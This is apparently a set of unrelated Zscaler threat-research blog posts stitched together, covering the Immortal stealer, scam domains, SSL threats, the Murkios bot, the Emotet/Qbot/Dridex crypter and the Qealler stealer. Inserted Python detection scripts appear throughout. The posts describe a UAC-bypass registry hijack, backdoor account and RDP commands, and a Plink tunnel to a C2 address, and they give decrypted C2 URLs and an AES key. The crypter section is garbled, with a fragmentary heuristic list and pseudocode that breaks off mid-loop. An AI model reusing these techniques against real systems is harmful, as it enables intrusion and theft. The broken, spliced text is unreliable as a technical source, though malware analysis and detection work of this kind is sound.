Immortal steals wallet.dat files from Bitcoin-Qt, a free and open-source Bitcoin wallet software. Below is a screenshot of the code for fetching the wallet path from the registry. The malware copies the wallet.dat file in “%Temp%\{Random_DirName}\”.
Desktop files
Immortal also walks every file in the Desktop folder on the victim's system and copies those with the extensions listed below into "%Temp%\{Random_DirName}\Files\".
Txt
Log
Doc
Docx
sql
Screenshot & Webcam
Immortal takes a screenshot of the infected system's desktop and saves it as "\%AppData%\{Random_DirName}\desktop.jpg". It also captures a webcam snapshot and saves it as "\%AppData%\{Random_DirName}\CamPicture.jpg".
Network communication
The malware stores all stolen data under "\%Temp%\{Random_DirName}\". It then compresses that directory into a ZIP archive saved as \%Temp%\{Random_filename}.zip, deletes the "\%Temp%\{Random_DirName}\" directory, and uploads {Random_filename}.zip to its command-and-control server with the parameters shown below.
User = User name
Hwid = MachineGuid
At the time of analysis, the command & control panel for this stealer was live.
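Because the staging directory is deleted before upload, the ZIP in %Temp% (or its copy in proxy logs) is often the only artifact a responder gets. The script below is an added example, not the stealer's or the post's code: it scores a ZIP by how many members match the staging layout described above (password.log, Cookies\*_cookies.txt, CC\*_CC.txt, Autofill\*_Autofill.txt, Applications\, FileZilla\, Files\, desktop.jpg, CamPicture.jpg, wallet.dat) and by whether password.log carries the Date/Windows Username/HWID/System header, then sweeps a directory for archives over a threshold. The sample archive it builds is constructed.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Layout Immortal stages under %Temp%\<random>\ before zipping it.
MARKER_RE = re.compile(
    r"^(?:password\.log|desktop\.jpg|CamPicture\.jpg|wallet\.dat"
    r"|Cookies/[^/]+_cookies\.txt|CC/[^/]+_CC\.txt|Autofill/[^/]+_Autofill\.txt"
    r"|Applications/.+|FileZilla/(?:recentservers|sitemanager)\.xml|Files/.+)$",
    re.IGNORECASE,
)
# Fields the stealer writes at the top of password.log.
LOG_FIELDS = ("Date:", "Windows Username:", "HWID:", "System:")


def score_archive(data):
    """Return (score, hits) for a ZIP given as bytes: one point per member
    matching the Immortal layout, plus one if password.log carries the
    expected header fields. Non-ZIP input scores 0."""
    hits = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return 0, hits
    with zf:
        names = [n.replace("\\", "/") for n in zf.namelist()]
        hits.extend(n for n in names if MARKER_RE.match(n))
        if "password.log" in names:
            head = zf.read("password.log").decode("utf-8", "replace")[:2048]
            if all(field in head for field in LOG_FIELDS):
                hits.append("password.log:header")
    return len(hits), hits


def triage_temp(temp_dir, threshold=3):
    """Scan *.zip in a %Temp% copy and return {path: hits} for archives at or
    above the threshold."""
    suspicious = {}
    for zpath in Path(temp_dir).glob("*.zip"):
        score, hits = score_archive(zpath.read_bytes())
        if score >= threshold:
            suspicious[str(zpath)] = hits
    return suspicious


def build_sample_archive():
    """Constructed ZIP mimicking Immortal's staging directory."""
    log = ("Immortal Stealer\nAuthor: <redacted>\nTelegram: @example\n"
           "Date: 04/10/2019 12:34:56\nWindows Username: bob\n"
           "HWID: 4c4c4544-0000-0000-0000-000000000000\nSystem: Windows 10 Pro\n"
           "SiteUrl: https://mail.example.test/\nLogin: bob\n"
           "Password: hunter2\nProgram: Chrome\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("password.log", log)
        zf.writestr("Cookies/Chrome_cookies.txt", "...")
        zf.writestr("CC/Chrome_CC.txt", "...")
        zf.writestr("Autofill/Chrome_Autofill.txt", "...")
        zf.writestr("Applications/Telegram/map0", b"\x00")
        zf.writestr("desktop.jpg", b"\xff\xd8\xff")
    return buf.getvalue()


def demo_triage():
    """Write the constructed archive and a benign one into a temp dir, sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "a1b2c3.zip").write_bytes(build_sample_archive())
        benign = io.BytesIO()
        with zipfile.ZipFile(benign, "w") as zf:
            zf.writestr("report.docx", b"PK")
        Path(tmp, "report.zip").write_bytes(benign.getvalue())
        return triage_temp(tmp)


if __name__ == "__main__":
    for path, hits in demo_triage().items():
        print(path, "->", hits)
```

The same `score_archive()` can be applied to the multipart body of the upload.php POST captured by a proxy, which is usually a cleaner copy than whatever survives in %Temp%.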
We found the Immortal stealer advertised and sold with different build-based subscriptions. The following screenshot shows a page describing all of Immortal's functionality and the cost per build; the listed price for one build is $30.
IOCs
Md5: 1719ff4ff267ef598a1dcee1d5b68667
Downloading URL : www.appleidservice[.]jp/stealer/files/svhost.exe
NetworkURL: www.appleidservice[.]jp/stealer/files/upload.php
Scammers Use Cheap and Squatted Domains to Create Fake Sites
Last summer, a ThreatLabZ blog covered scam campaigns in which bad actors using .tk domains were showing warnings of a fake malware infection and trying to generate revenue by offering remediations.
We recently noticed similar campaigns developing in which bad actors register cheap domains in bulk and use them to scam people in an attempt to generate revenue. In this blog, we cover a few such campaigns.
Infrastructure Sharing
In our research last year, we noticed that domains following patterns such as some-domain[.]tk/index/?{random-long-int} were primarily serving support scams: alerting users that their systems had been infected with malware, or claiming the page came from Microsoft and asking the user to call the hotline number shown. Once contacted, the scammer would take money from the victim, perform random actions such as showing the filesystem tree, and claim the system had been fixed.
This year, we are seeing slightly different behavior in which the same URI patterns are being leveraged for other scam redirections.
Fig. 1: Infection chain
The main site is injected with a malicious script that drives the redirection chain.
Fig. 2: Injected scripts
These injected scripts/URLs load different types of content in different iterations.
Fig. 3: Redirection chain
At the moment, these .tk domains are redirecting to various fake sites, including foreign exchange (forex), credit card, and healthcare, but the attacker can easily add more fake sites from other categories.
Fig. 4: Final .tk redirection to fake site
There are more than 700 .tk domains hosted on 185.251.39[.]220 and more than 80 .tk domains on 185.251.39[.]181, which are associated with this campaign.
Domain squatting leads to tech support scam
We came across interesting instances in which gmil[.]com, a typosquat of the Google Mail domain, was responsible for redirection to a Microsoft tech support scam.
Fig. 5: Google Mail squatted domain leading to Microsoft Tech Support scam
The scam page that we received is similar to what we saw in our previous analysis, and there has been little to no development.
Fig. 6: Support scam page
The page microsft0x8024f0059rus[.]ml is hosted on 216.10.249[.]196, which hosts over 400 .ga, .cf, .gq, .ml, and .tk domains, all involved in Microsoft tech support scam activity.
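gmil[.]com is one character away from gmail.com, and the same single-edit families (deletion, transposition, substitution, repetition, insertion) plus a swap to a cheap TLD account for most of the squats a brand owner or blue team needs to watch. The script below is an added example, not tooling from the post: it enumerates those variants for a brand and classifies an observed list of domains (constructed here) by the edit that produced them. It assumes two-label domains such as brand.tld; the cheap-TLD list is the one named in this post.

```python
import string

ALPHABET = string.ascii_lowercase + string.digits + "-"


def label_variants(label):
    """Map each single-edit variant of a second-level label to the kind of typo
    that produces it. Earlier kinds win when two edits yield the same string."""
    variants = {}

    def add(kind, candidate):
        if candidate and candidate != label:
            variants.setdefault(candidate, kind)

    for i in range(len(label)):
        add("deletion", label[:i] + label[i + 1:])
    for i in range(len(label) - 1):
        add("transposition", label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(len(label)):
        for c in ALPHABET:
            add("substitution", label[:i] + c + label[i + 1:])
    for i in range(len(label)):
        add("repetition", label[:i] + label[i] + label[i:])
    for i in range(len(label) + 1):
        for c in ALPHABET:
            add("insertion", label[:i] + c + label[i:])
    return variants


def classify_lookalikes(brand, observed, cheap_tlds=("tk", "ml", "ga", "cf", "gq")):
    """Return {domain: kind} for observed domains that are one typo away from
    the brand label, or carry the exact brand label on another TLD.
    Assumes two-label domains (label.tld)."""
    label, _, tld = brand.lower().partition(".")
    variants = label_variants(label)
    hits = {}
    for domain in observed:
        domain = domain.lower().rstrip(".")
        lbl, _, t = domain.partition(".")
        if lbl == label and t != tld:
            hits[domain] = "tld-swap (cheap TLD)" if t in cheap_tlds else "tld-swap"
        elif lbl in variants:
            hits[domain] = variants[lbl]
    return hits


# Constructed list of "newly seen" domains, as a passive-DNS or CT-log feed
# might produce them.
OBSERVED = ["gmil.com", "gamil.com", "gmail.tk", "gmaill.com", "gmai1.com",
            "example.com", "gmail.org"]

if __name__ == "__main__":
    for domain, kind in classify_lookalikes("gmail.com", OBSERVED).items():
        print(f"{domain:14} {kind}")
```

In practice you run `label_variants()` once per brand and diff the resulting set against daily new-domain feeds; the variant count for a five-letter label is a few hundred, small enough to hold in a set.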
PopCash leading to fake sites, including medicine, tax debt relief, repair services, and adult sites
Fig. 7: PopCash redirecting to fake sites that use the same page template
In another redirection iteration, we saw adult-themed sites and a fake medicine site claiming to be CNN.
Fig. 8: Adult themed site and fake CNN page selling Viagra
Fake airlines
We also spotted fake airline sites using an identical template, contact number, and Google gtag.
Fig. 9: Similar fake airline sites
The use of a nearly identical template indicates that a scam kit is being used to generate the page content automatically.
Fig. 10: Template comparisons
The IP address 103.25.128[.]224 is hosting 70 or more of these fake airline sites.
Conclusion
Scam campaigns leveraging cheap domains such as .tk, .ga, .gq, .ml, and .cf have been on the rise for the past few years. Because registering such domains is very inexpensive, bad actors register them in bulk and use them to generate revenue.
While some of these sites are poorly designed and obvious scams, others are sophisticated and look very much like the real brand. Always look at a site’s URL to make sure the site is legitimate before initiating communications or making any kind of transaction.
Zscaler ThreatLabZ is actively monitoring scamming sites and other threats to ensure coverage and will continue to share information on these campaigns.
IOCs
All scam domains involved in the above campaigns can be seen here.
What’s hiding in encrypted traffic? Millions of advanced threats.
Once seen as the ultimate protection for data being transmitted over the internet, encryption has become a vast playground for cybercriminals.
Zscaler ThreatLabZ, the research organization at Zscaler, analyzed the encrypted traffic traversing the Zscaler cloud in the second half of 2018 and prepared a report of our findings. The Zscaler cloud processes more than 60 billion transactions a day and, at that volume, it provides valuable insight into traffic patterns and the types of threats organizations are facing globally.
We already knew that the use of encryption had been rising each year and our research showed this trend continuing. By December 2018, the amount of encrypted traffic on the Zscaler cloud increased by 10 percent to nearly 80 percent of all traffic. This growth rate is consistent with that of the Google Transparency Report and Mozilla’s findings for the Firefox browser.
Zscaler has always made its cloud statistics available to anyone who wants to see them. We have recently created a dashboard that shows the volume of encrypted traffic crossing our cloud as a percentage of total traffic. You can view that interactive dashboard here.
Real-Time Zscaler Cloud Activity: Encrypted Traffic Dashboard
As the use of SSL* grows, cybercriminals are increasingly using encryption to conceal and launch attacks. In the second half of 2018, the Zscaler cloud blocked 1.7 billion threats hidden in SSL traffic, which translates to an average of 283 million advanced threats blocked per month. The top blocked threat categories in our study period included phishing attempts—which increased more than 400 percent over 2017—as well as malicious content, botnets, and browser exploits.
One of the reasons that SSL-based threats have increased so dramatically is because SSL/TLS certificates, which were once expensive and difficult to obtain, are now easy to get—at no charge. The vast majority of the certificates involved in security blocks in the Zscaler cloud were issued by Let’s Encrypt, a free service. Furthermore, nearly 32 percent of newly registered domains that were blocked by our cloud were using SSL encryption to deliver the content. We recommend inspecting and/or restricting access to newly registered domains, including those using SSL, to scan for malicious content being delivered from an otherwise unknown location with no history or reputation.
While the percentage of growth in SSL traffic is slowing as it reaches near totality, the threat trends are increasing in both frequency and sophistication. Cybercriminals know that most organizations are unable to inspect SSL traffic at scale. So, with malicious websites that can be set up in no time with free SSL certificates, they’re launching attacks that have a good chance of going undetected.
Organizations should be inspecting all encrypted traffic, even from CDNs and trusted sites, because many of the threats we continue to block are from legitimate sites that have been compromised. Organizations that don’t inspect all traffic are at risk of infiltration that can be difficult to remediate, lead to costly breaches, or damage their reputation.
Read the full ThreatLabZ analysis of SSL/TLS-based threats: SSL Report
*The encryption protocol is known by several terms—Secure Sockets Layer (SSL), Transport Layer Security (TLS), and HTTPS—and they are often used interchangeably. For the sake of simplicity, I am using “SSL” in this blog.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Deepen Desai is Zscaler VP of Security Research and Operations
Murkios bot drops files and controls system remotely
The Zscaler ThreatLabZ team came across the Murkios bot, which silently installs itself on a user's system and connects to a command-and-control (C&C) server by opening Secure Shell (SSH) sessions from the compromised system. The bot also installs "Plink," the legitimate command-line SSH client from the PuTTY suite, which it runs from the command prompt with switches supplied by the C&C server. The bot appears to have been written by Russian-speaking malware authors, which we were able to confirm after seeing some snippets in the resource section.
The screenshot below shows the malware being tested on different operating systems.
During our analysis, we saw the following files being dropped by Murkios:
Win XP:
%AppData%\ssh\start.exe
%AppData%\ssh\systems.exe
%AppData%\ssh\winsys.exe
%AppData%\ssh\winsystem.exe
%AppData%\ssh\uid.txt
%AppData%\ssh\sel.txt
Win 7/Win 10:
%AppData%\Roaming\ssh\start.exe
%AppData%\Roaming\ssh\systems.exe
%AppData%\Roaming\ssh\winsys.exe
%AppData%\Roaming\ssh\winsystem.exe
%AppData%\Roaming\ssh\uid.txt
%AppData%\Roaming\ssh\sel.txt
Below is a summary of activities performed by dropped files:
systems.exe – Installs RDP wrapper library
winsystem.exe – Legitimate Plink command-line SSH client from the PuTTY suite
winsys.exe – Module acts as a mule sending all the harvested information to the attacker and has screen capture functionality
start.exe – Has functionality to bypass UAC, checks OS version installed, executes other modules such as winsys.exe, adds net user accounts
uid.txt – Stores unique identification (UID) of the victim's system
All the dropped files are present in the resource section of the parent file.
The malware tries to bypass User Account Control (UAC) so that it can run elevated; once running, it establishes a connection with the C&C server and steals system information from the victim's system.
The malware checks whether UAC is enabled in the registry; if the value is "1" (UAC enabled), it deletes the mscfile registry class key, recreates it, and writes the path of start.exe (placed in the application data directory) into it. This is the registry handler consulted when an auto-elevating Microsoft Console host opens an .msc file, so the hijacked key launches start.exe with elevated privileges.
Next, it checks whether the system is 32 bit or 64 bit:
start.exe then runs schtasks.exe to create a scheduled task that executes winsys.exe, which installs the remote-access tooling on the victim's system. Parameters used:
/sc: Specifies Schedule Type
ONLOGON: The task runs whenever a user (any user) logs on
/tn: Specifying the name of the task
/tr: Specifies the program or command that the task runs (winsys.exe in this case)
The malware uses the net user command to add a user account and set its password, running the command prompt hidden.
Enabling remote desktop from the command prompt:
Parameters:
/MAXPWAGE: UNLIMITED: Never expire the password.
localport=3389: The server listens on TCP port 3389, which is the port Microsoft uses for Windows Remote Desktop, and makes remote assistance connections which are also used by Windows terminal users. It tries to change the Remote Desktop Protocol-Transmission Control Protocol (RDP-TCP) connections permissions in the Windows registry through the Microsoft Windows terminal service.
The malware can take control of a remote computer or virtual machine over a network. It uses the following Terminal Services settings while configuring RDP (setting – description):
AllowTSConnections – Enables remote desktop connections through Terminal Services
fDenyTSConnections – Allows or denies connections to Terminal Services; possible values are 0 (allow) or 1 (deny)
MaxConnectionTime – Maximum session time in seconds
MaxDisconnectionTime – Maximum time in seconds after which disconnected sessions are ended
MaxIdleTime – Maximum idle time in seconds for user sessions
Further, the system.exe process runs hidden via a cmd.exe switch and installs the RDP Wrapper files into the C:\Program Files\RDP Wrapper directory, which enables Remote Desktop Host support and concurrent RDP sessions on home editions of Windows that otherwise offer reduced functionality. RDP Wrapper works as a layer between the Service Control Manager and Terminal Services, so the original termsrv.dll file remains untouched.
Sends data to C&C:
After sending data to the server, the malware executes winsys.exe, which in turn executes winsystem.exe to download the Plink PuTTY software. The winsys.exe executable also runs hidden through the command prompt.
Winsys.exe
This module acts as a mule and sends all the harvested information to the attacker. It has three functions. The first captures the screen of the compromised system and sends it to the attacker.
After receiving the screen capture, the attacker's server acknowledges it with "online=ok", and the module continues to send the UID and screen captures from the compromised system back to the attacker.
Finally, the malware tries to make an SSH tunnel to 193.238.46.117 in hidden mode with multiple arguments, as shown below.
-P: connect to the specified port
-hostkey: manually specify a host key
-batch: disable all interactive prompts
-pw: login with specified password
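As an added example (not code from the original post), the following Python flags the persistence chain described above in process-creation command lines: the ONLOGON scheduled task, the added user account with a non-expiring password, the firewall rule for port 3389, the fDenyTSConnections change, the RDP Wrapper directory and the Plink tunnel. The log lines are constructed, and the account name, password, fingerprint and host are placeholders.

```python
import re

# Constructed process-creation command lines mirroring the behaviour described
# above (sample data, not a real capture; account, password and host are placeholders).
SAMPLE_EVENTS = [
    (1, r"cmd.exe /c schtasks /create /sc ONLOGON /tn WinSys /tr C:\Users\victim\AppData\Roaming\app\winsys.exe"),
    (2, r"net user <placeholder-user> <placeholder-password> /add"),
    (3, r"net accounts /MAXPWAGE:UNLIMITED"),
    (4, r"netsh advfirewall firewall add rule name=rdp dir=in protocol=tcp localport=3389 action=allow"),
    (5, r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    (6, r'"C:\Program Files\RDP Wrapper\<placeholder-installer>.exe" -i'),
    (7, r"winsystem.exe -P 22 -hostkey <placeholder-fingerprint> -batch -pw <placeholder-password> <user>@<c2-host>"),
    (8, r"notepad.exe C:\Users\victim\notes.txt"),
]

# Each rule is one link of the chain; matching is case-insensitive on the raw command line.
RULES = [
    ("onlogon_task", re.compile(r"\bschtasks\b.*?/sc\s+onlogon\b.*?/tr\s+\S+", re.I)),
    ("net_user_add", re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("pw_never_expires", re.compile(r"/maxpwage:\s*unlimited\b", re.I)),
    ("rdp_port_rule", re.compile(r"\blocalport=3389\b", re.I)),
    ("rdp_enable", re.compile(r"\bfDenyTSConnections\b.*?/d\s+0\b", re.I)),
    ("rdp_wrapper", re.compile(r"\\RDP Wrapper\\", re.I)),
    ("plink_tunnel", re.compile(r"-hostkey\s+\S+.*?-batch\b.*?-pw\s+\S+", re.I)),
]


def classify(cmdline):
    """Names of the chain links a single command line matches, in chain order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def detect(events):
    """Map each matched rule name to the event ids that triggered it."""
    hits = {}
    for event_id, cmdline in events:
        for name in classify(cmdline):
            hits.setdefault(name, []).append(event_id)
    return hits


def chain_detected(events, min_links=3):
    """True when at least `min_links` distinct links of the chain appear on the host;
    the threshold keeps a lone 'net user /add' by an administrator from alerting."""
    return len(detect(events)) >= min_links


if __name__ == "__main__":
    for rule, ids in detect(SAMPLE_EVENTS).items():
        print(f"{rule:18s} events {ids}")
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```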
IOC:
soft.exe – MD5 32dd601839d62e939880d03a81fde5e8
Dropped files (filename – MD5):
system.exe – 6E83A0F762F014924E24D81C07021690
winsys.exe – 473ED02A55DC91A6E719F270DF16AE35
winsystem.exe – 528248AE133191C591EC6D12732F2CFD
start.exe – 2A07FE3AEBD009D7308FD25E0C872CF9s
uid.txt – E46B1D5A895E0E15C3CF0F2BA05DAB45
Download URL: murikos[.]in/soft.exe
Demystifying the Crypter Used in Emotet, Qbot, and Dridex
A crypter is software that encrypts, obfuscates, and manipulates malware to make it harder for security programs to detect. The Zscaler ThreatLabZ research team recently spotted a common crypter being used in the recent Emotet, Qbot, and Dridex campaigns. This same crypter was observed in some of the Ursnif and BitPaymer campaigns as well. One of the reasons Emotet and Dridex have survived for so long is their ability to evade detection through the use of a volatile and polymorphic crypter, which wraps the original binary to complicate its detection and analysis.
Emotet is modular malware that primarily functions as a downloader or dropper for other banking Trojans. Emotet has been active for the past four years and it was one of the most prevalent malware families of 2018. In previous blogs, we analyzed Emotet and one of its delivery campaigns. Dridex is a banking Trojan that evolved from the Zeus Trojan family. Dridex remains active in the wild even after the FBI’s takedown attempt in 2015. Qbot can allow remote access to a victim’s system, steal information, and upload this stolen information to the attacker’s remote server. Recently, Emotet’s payload URLs were found to be serving Qbot and were using the same crypter we’re examining in this report.
This crypter provides multiple layers of protection on its core malware binary. In this research, we will describe the properties of crypted binaries that hold true across various mutations. These properties can be validated statically (without executing the binary) and used to write a decrypter. Below is a pictorial view of how Emotet’s core binary is digested inside the crypter’s layers of obfuscation and encryption wrappers.
0. Core binary
1. Code is obfuscated by shuffling instructions and substituting jump instructions
2. Obfuscated binary is encrypted and appended at the end of the custom loader binary
3. File alignment of custom loader binary is jumbled
4. Custom loader binary is encrypted
5. Final binary encapsulating scattered chunks of encrypted custom loader binary
Image 1: Stages of the crypter
Our goal is to reverse each of the above stages to get the core malware binary. Furthermore, the core binary should be independently loadable and executable, and its IOCs should be easily extractable. So, starting with stage 5, we will describe certain heuristic properties of the binary, use those properties to decrypt the stage, and continue down to stage 0. In our analysis, we found that these heuristic properties hold true across all mutations of the binaries.
Stage 5:
The stage 5 binary is the Emotet executable file that is downloaded via malicious links in malspam or by malicious macros in MS Office documents. Our goal in stage 5 is to reach stage 4 and obtain the encrypted custom loader binary. As we can see in image 1, the binary at this stage contains scattered chunks of the encrypted custom loader binary. We need to spot these chunks and assemble them in the proper order. Before discussing how we do this, here are a few examples of how these chunks can be spread across the binary. The chunks are outlined in red.
Image 2. Examples of chunk patterns
From the above examples, we can see that these chunks are not found at fixed locations, their sizes are inconsistent, and the order of the chunks varies, too. Therefore, our first challenge is to locate these chunks and arrange them in the proper order. The good news is that the crypter also needs to arrange the chunks, and it does so by storing the chunk addresses and sizes in a table. Let's call this table the "Chunk Descriptor Table." The bad news is that this table cannot be found at a predictable location in the binary, nor is its structure constant across mutations of the binary. Below are some of the variants of this table structure. The Chunk Descriptor Table is basically an array of Chunk Descriptor Entry structures.
struct ChunkDescriptorEntry[n] ChunkDescriptorTable; // n == number of chunks
Image 3: Examples of Chunk Descriptor Table structures
In the above structure, "chunkAddressDword" contains the virtual address of the chunk. The size of the chunk can be obtained by one of the following operations on "firstDword" and "secondDword"; the operation is constant across all chunk descriptor entries of a given binary.
unsigned int chunkSize = firstDword + secondDword
unsigned int chunkSize = firstDword ^ secondDword
unsigned int chunkSize = secondDword - firstDword
Heuristic properties of the Chunk Descriptor Table:
0 5 out of 8.
Chunks do not contain four consecutive zero bytes.
The following is pseudocode for finding the chunk pattern. The function "FindChunkEntry" returns the offset of a chunk descriptor entry together with the distances of firstDword and chunkAddressDword from the beginning of that offset. If three consecutive calls return offsets that are equally spaced, the whole array can be parsed to generate an associative array of chunk addresses and chunk sizes.
    (offset1, m1, n1) = FindChunkEntry(filedata, fileSize)
    (offset2, m2, n2) = FindChunkEntry(filedata + offset1, fileSize)
    (offset3, m3, n3) = FindChunkEntry(filedata + offset2, fileSize)
    if (offset2 - offset1) == (offset3 - offset2)
        // found the Chunk Descriptor Entry array

    FindChunkEntry(filedata, fileSize)
        p = 0
        while p < fileSize
            firstDword = filedata[p]
            q = p
            while q

    while (pDeObfuscationTable->dwOrgInstrVAdddress != 0x00) {
        patchOffset = GetFileOffsetFromRVA(pCorePEHeader, pCoreSectionHeaders,
                                           pDeObfuscationTable->dwPatchRVAddress);
        orgInstrOffset = GetFileOffsetFromRVA(pLoaderPEHeader, pLoaderSectionHeaders,
                                              pDeObfuscationTable->dwOrgInstrVAdddress
                                                  - pLoaderPEHeader->OptionalHeader.ImageBase);
        // copy the original instruction bytes from the loader back over the patched location
        memcpy(pbyCoreFileData + patchOffset, pbyLoaderFileData + orgInstrOffset,
               pDeObfuscationTable->dwOrgInstrLength);
        pDeObfuscationTable += 1;
    }
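As an added example (not the authors' decrypter), this Python implements the stage 5 search described above over a constructed blob. It assumes a hypothetical three-dword entry layout (firstDword, secondDword, chunkAddressDword) and treats chunkAddressDword as a file offset rather than a virtual address; it tries each of the three size operations, requires three equally spaced plausible entries, and rejects any chunk containing four consecutive zero bytes.

```python
import struct

# The three size operations the text lists; the one in use is constant across a table.
SIZE_OPS = {
    "add": lambda a, b: (a + b) & 0xFFFFFFFF,
    "xor": lambda a, b: a ^ b,
    "sub": lambda a, b: (b - a) & 0xFFFFFFFF,
}
# Assumed (hypothetical) entry layout: firstDword, secondDword, chunkAddressDword.
# chunkAddressDword is treated here as a plain file offset (no RVA translation).
ENTRY_LEN = 12


def plausible_entry(filedata, off, op):
    """Decode the 12 bytes at `off` as an entry; return (addr, size) if the chunk
    it describes lies inside the file and has no four consecutive zero bytes."""
    if off + ENTRY_LEN > len(filedata):
        return None
    first, second, addr = struct.unpack_from("<III", filedata, off)
    size = SIZE_OPS[op](first, second)
    if size == 0 or addr + size > len(filedata):
        return None
    if b"\x00\x00\x00\x00" in filedata[addr:addr + size]:
        return None
    return addr, size


def find_chunk_entry(filedata, start, op):
    """Offset of the first plausible entry at or after `start`, else None."""
    for off in range(start, len(filedata) - ENTRY_LEN + 1):
        if plausible_entry(filedata, off, op) is not None:
            return off
    return None


def find_chunk_table(filedata):
    """Locate the Chunk Descriptor Table: three consecutive plausible entries
    separated by the same stride. Returns (table_offset, stride, op) or None."""
    for op in SIZE_OPS:
        start = 0
        while True:
            o1 = find_chunk_entry(filedata, start, op)
            if o1 is None:
                break
            o2 = find_chunk_entry(filedata, o1 + 1, op)
            o3 = None if o2 is None else find_chunk_entry(filedata, o2 + 1, op)
            if o3 is not None and (o2 - o1) == (o3 - o2):
                return o1, o2 - o1, op
            start = o1 + 1
    return None


def parse_chunk_table(filedata, table_off, stride, op):
    """Walk the array until the first implausible entry; ordered (addr, size) list."""
    entries = []
    off = table_off
    while True:
        entry = plausible_entry(filedata, off, op)
        if entry is None:
            return entries
        entries.append(entry)
        off += stride


def reassemble_loader(filedata):
    """Whole stage 5 step: find the table, then concatenate chunks in table order."""
    found = find_chunk_table(filedata)
    if found is None:
        return None
    table_off, stride, op = found
    entries = parse_chunk_table(filedata, table_off, stride, op)
    return b"".join(filedata[a:a + s] for a, s in entries)


def build_sample():
    """Constructed stage-5-like blob (not a real sample): a 96-byte 'loader' split
    into three chunks scattered out of order, plus an 'add'-style descriptor table."""
    loader = bytes(range(1, 0x61))          # no zero bytes, so chunks pass the check
    blob = bytearray(0x200)                 # zero filler between the pieces
    blob[0xC0:0xD0] = loader[0x00:0x10]     # table entry 0 stored last in the file
    blob[0x40:0x60] = loader[0x10:0x30]     # table entry 1
    blob[0x80:0xB0] = loader[0x30:0x60]     # table entry 2
    table = struct.pack("<III", 0x08, 0x08, 0xC0)   # 0x08 + 0x08 = 0x10 bytes
    table += struct.pack("<III", 0x0C, 0x14, 0x40)  # 0x0C + 0x14 = 0x20 bytes
    table += struct.pack("<III", 0x10, 0x20, 0x80)  # 0x10 + 0x20 = 0x30 bytes
    blob[0x100:0x100 + len(table)] = table
    return bytes(blob), loader


if __name__ == "__main__":
    blob, loader = build_sample()
    print("table:", find_chunk_table(blob))
    print("recovered loader matches:", reassemble_loader(blob) == loader)
```

On a real sample the chunk address would first be translated from a virtual address to a file offset using the PE section headers, which this example leaves out.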
At this stage, we would have obtained the plain, independently executable core Emotet binary, which can be decompiled by IDA or can be bin-diffed with other binaries extracted by this decoder.
Qealler – a new JAR-based information stealer
Recently, the Zscaler ThreatLabZ team came across a new type of malware called Qealler, which is written in Java and designed to silently steal sensitive information from an infected machine.
Qealler is a highly obfuscated Java loader that deploys a Python credential harvester.
We first saw this payload hit Zscaler Cloud Sandbox on Jan 21, 2019, and below is a screenshot of the detonation report.
Fig. 1: Zscaler Cloud Sandbox report
This threat makes use of social engineering techniques to initiate the infection, as the malicious JAR file has to be executed by the user. These malicious JAR files are portrayed as invoice-related files, requiring the user to double-click on the file to open it.
We have been monitoring this campaign for the past two weeks, and the malware has been quite active, spiking this week.
Fig. 2: Hits of Qealler in a week
The malicious JAR file we analyzed (named Remittance.jar) was being downloaded from a compromised site (hiexsgroup.co[.]uk). It is heavily obfuscated with the ProGuard Java obfuscator. After deobfuscation and decompilation, we saw encrypted URLs that are accessed by a key, as shown in the figure below.
Fig. 3: Accessing encrypted URLs
The sample has a “synchronized” file that contains key-value pairs.
Fig. 4: Key-Value pair of encrypted URLs
On execution, this sample first creates two file paths under %USERPROFILE% from CRC32 checksums of hardcoded strings.
Fig. 5: File Path creation
File path 1:
%USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“lib”)\\CRC32(“8e65457409fea4b2a183125f1c0f552080edb4cefa516b14698cb8d0abf5bb6dFILE”)
Equivalent to:
%USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\83e7cdf9
File Path 2:
%USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“lib”)\\CRC32(“0e10ad6938994f2466b192d8f29217ad39155b8a3a082b6412048f4a12126b3bFILE”)
Equivalent to:
%USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\db2bf213
If the above two files don’t exist, the malicious file decrypts the URL, downloads these two files, and stores them in the same place.
Fig. 6: Encrypts and drops downloaded module
The value of LIB_7Z_URL in the synchronized file is "xVQR4PWAw91AhkgaMsQVAVV1igV7HSOV1dqWgFN23eQtkNRd23RzTnPVGB9/iVYA", which is decoded from Base64 and decrypted with AES-ECB using the hardcoded key "bbb6fec5ebef0d93".
The final URL after decryption is hxxp://82.196.11[.]96:55326/lib/7z
The value of LIB_QEALLER_URL in the synchronized file is "xVQR4PWAw91AhkgaMsQVAaWhGxVQIpMxX60ZE+OpV3KjNnWvOARi0rccZaVSvle8", which is decrypted with the same algorithm and the same key.
The final URL is hxxp://82.196.11[.]96:54869/lib/qealler
The sample downloads the data from these URLs and encrypts it using the AES algorithm with a key generated by SecureRandom() seeded with the hardcoded value "2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b".
AES key: 39 3e df 7e fc 58 be 20 60 e4 78 bb 4a 91 38 72
After encryption, it stores both files at the below locations to avoid further downloading in the next run:
%USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\83e7cdf9 (/lib/7z)
%USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\db2bf213 (/lib/qealler)
Fig. 7: Created path and dropped files
Along with these two files, the malware creates another file path with the following algorithm and stores an encrypted unique machine ID in it. The ID is generated from a random number derived from the system nanoTime.
Machine ID path:
